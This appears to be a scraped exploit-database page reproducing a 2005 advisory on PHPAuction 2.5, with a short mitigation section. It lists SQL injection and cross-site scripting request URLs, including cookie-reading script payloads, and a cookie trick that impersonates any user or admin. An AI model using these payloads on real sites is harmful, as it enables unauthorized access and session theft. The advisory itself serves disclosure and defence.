Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-import-export-lite domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6121

Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the insert-headers-and-footers domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6121

Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6121
PHPAuction Multiple Remote Vulnerabilities - exploit.company
header-logo
Suggest Exploit
vendor:
PHPAuction
by:
SecurityFocus
7.5
CVSS
HIGH
SQL Injection, Cross-site Scripting, Authentication Bypass
89, 79, 287
CWE
Product Name: PHPAuction
Affected Version From: 2.5
Affected Version To: 2.5
Patch Exists: YES
Related CWE: N/A
CPE: a:phpauction:phpauction
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2005

PHPAuction Multiple Remote Vulnerabilities

PHPAuction is affected by multiple remote vulnerabilities. These issues can allow an attacker to gain unauthorized access to a site and carry out SQL injection and cross-site scripting attacks. An attacker can set a cookie with the name PHPAUCTION_RM_ID and the value of the ID number of the user/admin they want to impersonate to bypass authentication.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries. Ensure that user input is properly sanitized and validated before being used in HTML output. Implement proper authentication and authorization controls.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/14184/info

PHPAuction is affected by multiple remote vulnerabilities. These issues can allow an attacker to gain unauthorized access to a site and carry out SQL injection and cross-site scripting attacks.

PHPAuction 2.5 is reported to be affected by these issues. It is possible that other versions are vulnerable as well. 

SQL Injection:
/phpauction-gpl-2.5/adsearch.php?title=1&desc=on&closed=on&category='SQL_INJECTION&minprice=1&maxprice=1&payment%5B%5D=on&payment%5B%5D=on&payment%5B%5D=on&payment%5B%5D=
on&seller=1&country=Afghanistan&ending=1&SortProperty=ends&type=2&action=search&go=GO%20%3E%3E

/viewnews.php?id='SQL_INJECTION

Cross-site scripting:
/phpauction-gpl-2.5/index.php?lan=<script>alert(document.cookie)</script>

/phpauction-gpl-2.5/profile.php?user_id=158&auction_id=<script>alert(document.cookie)</script>

/phpauction-gpl-2.5/profile.php?auction_id=<script>alert(document.cookie)</script>&id=159

/phpauction-gpl-2.5/admin/index.php?lan=<script>alert(document.cookie)</script>

/login.php?username=<script>alert(document.cookie)</script>

/viewnews.php?id=<script>alert(document.cookie)</script>

Authentication bypass:

Set the cookie as follows:
Name: PHPAUCTION_RM_ID
VALUE: Id number of the user/admin you want to impersonate (you can get it from thier profile)

Navigation

Suggest Exploit

Services By CQR

cqrsecured